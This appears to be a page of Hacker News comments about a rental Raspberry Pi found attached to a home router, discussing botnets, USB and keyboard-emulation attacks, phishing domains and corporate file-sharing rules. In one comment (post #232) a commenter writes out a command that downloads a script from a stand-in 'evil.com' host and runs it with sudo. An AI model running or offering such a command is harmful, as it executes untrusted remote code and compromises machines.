Live data from Hacker News

Found hooked up to my router

reddit.com

231–240 of 358 posts

Re: Found hooked up to my router

#231
post #218

This is overblown, isn't it? That thing can't do anything that a public wifi couldn't, and yet everyone connects their laptops to those without hassle. SSL is nearly everywhere now...

There is a big difference though. This thing can actually act as an agent in a botnet that could be used for lot of things, such as DDOS'ng.

Re: Found hooked up to my router

#232
post #215

Earlier quoted context omitted.

So these IT genuises at a Fortune 500 company were clever enough to test their employees' computer security acumen (and get the predicted result) but they weren't clever enough to simply block all use of USB mass storage devices on their corporate operating system distribution? Surely by now all corporate desktops should be configured to not respond to any USB devices other than the generic HID for mouse and keyboard…

Don't believe generic hid is safe either. You could make a device that pretends it's a keyboard and automatically inputs win+r curl http://evil.com/script.sh | sudo sh sleep alt+y. Sorry for mixing windows and Linux but conceptually something like this should work on windows if you don't require password in your UAC prompts.

Just leaking data requires no UAC!

Re: Found hooked up to my router

#233
post #138

> I have a Raspberry Pi right now in my hands fron rentyouraccont.com, i have it running diagnostics on an Air-Gapped pc. This thing is wild. Every second it tries to connect to bot-net programs. It not only buys ads on facebook (which btw i cannot find code that it actually does this) but it is creating links to malware ridden embeds. It is part of a Botnet, i can say for sure. Every second it tries to establish a c…

How is that even possible? How does it capture keystrokes (unless you mean Google searches where each key is sent for autocomplete). How does it break SSL?

It's probably not this attack but any WiFi device can probably be used to key log you.

https://threatpost.com/keystroke-recognition-uses-wi-fi-sign...

Re: Found hooked up to my router

#234

Earlier quoted context omitted.

Have USB sticks stopped being common...? I'd guess there are a dozen or two around my house right now.

Many people have started using cloud services for private file sharing. But corporations often ban their use, so employees resort to USB devices.

That's weird, given how USB devices are also often banned so people resort to using online services. I implore people to prefer Airdrop, as it's an encrypted peer-to-peer system. Slack is the easy option, but it's a US based corporation. If you'd pass customer data through Slack you'd already be in violation of local laws.

Re: Found hooked up to my router

#236

Earlier quoted context omitted.

Or it redirects you to https:// yöurbank .com/, and you see the green padlock and think nothing more of it. Edit: made HN not mangle the link.

I’d like to know which CA would issue an EV cert for a site like that - so I can remove them from my cert stores.

CA's are fully automated, they won't review or check for phishing lookalikes. Maybe reactively if it's being reported, but, should they operate as the internet police? What if it's a legitimate bank that has the same name (with an accent) and isn't beholden to the same trademark in their country?

Re: Found hooked up to my router

#237
post #171
post #168

Earlier quoted context omitted.

Which would capture passwords in plaintext sent from the user side, no?

Yes, but browsers give huge warnings about password fields on non-SSL sites. Password in the clear won't happen with any major website.

If the site is non-SSL, then there's nothing stopping somebody in control of the network from replacing all "password" fields with plain "text" fields, and then applying a custom font to them so every character entered is displayed as a "•"

Re: Found hooked up to my router

#238

Earlier quoted context omitted.

So these IT genuises at a Fortune 500 company were clever enough to test their employees' computer security acumen (and get the predicted result) but they weren't clever enough to simply block all use of USB mass storage devices on their corporate operating system distribution? Surely by now all corporate desktops should be configured to not respond to any USB devices other than the generic HID for mouse and keyboard…

Trouble is that the same corporation has the following additional policies: * A ban on mail attachments of certain types (excel, zip files...) * mailbox limits from the 1990’s (100MB or so) * a ban on Dropbox, Gdrive or any other file sharing service * No public facing sftp or similar * A web site so mired in red tape that it takes 6 months and a dozen approvals to get anything uploaded. Often the USB drive or someth…

In these situations the organization really should get box.com subscription (or Dropbox enterprise) and have file sharing with control, auditing and org policies.

Re: Found hooked up to my router

#239

Time for a new roommate.

For serious. the kind of idiot who would hand over facebook credentials, bank account info, and physical network access for fifteen bucks a month to a total rando is also the kind of idiot who will dig up their roommate's social security card to help them out when the nice person from the IRS calls about back taxes.

I'd quite happily pimp out my unused fake Facebook profile for $15.

Lock the 'device' into its own subnetted VLAN so it can't see any local traffic and it's easy money paid into a deposit-only savings account...

Post reply on HN